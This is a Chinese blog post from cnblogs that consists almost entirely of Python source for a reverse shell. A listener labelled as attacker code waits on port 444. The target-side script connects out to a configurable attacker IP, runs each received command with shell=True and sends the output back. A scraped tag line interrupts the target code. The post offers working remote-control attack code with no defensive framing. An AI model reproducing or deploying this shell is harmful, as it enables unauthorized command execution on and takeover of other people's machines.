攻击端代码
import socket
# 创建一个TCP socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 设置监听的IP和端口
host = '0.0.0.0' # 监听所有网络接口
port = 444 # 监听端口
# 绑定并监听
server.bind((host, port))
server.listen(5)
print(f"Listening on {host}:{port}...")
# 等待连接
client_socket, client_address = server.accept()
print(f"Connection established with {client_address}")
# 获取并发送Shell的输出
while True:
# 接收命令
command = input("Shell> ")
if command.lower() == 'exit':
client_socket.send(b"exit")
break
# 发送命令到客户端
client_socket.send(command.encode())
# 获取客户端的输出
response = client_socket.recv(4096)
try:
print(response.decode('gbk'), end="")
except UnicodeDecodeError:
print("无法解码的内容:", response)
client_socket.close()
server.close()
目标机器代码
import socket标签:shell,socket,python,监听,client,反向,攻击者,command,port From: https://www.cnblogs.com/ljna/p/18632361
import subprocess
import os
# 攻击者的IP和端口
attacker_ip = '127.0.0.1' # 改为攻击者的IP地址
attacker_port = 444 # 改为攻击者的监听端口
# 创建一个socket对象
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 连接到攻击者的机器
client.connect((attacker_ip, attacker_port))
# 接受命令并执行
while True:
# 接收攻击者的命令
command = client.recv(1024).decode()
if command.lower() == 'exit':
break
# 执行命令并返回结果
output = subprocess.run(command, shell=True, capture_output=True)
result = output.stdout + output.stderr
# 发送执行结果回攻击者
client.send(result)
# 关闭连接
client.close()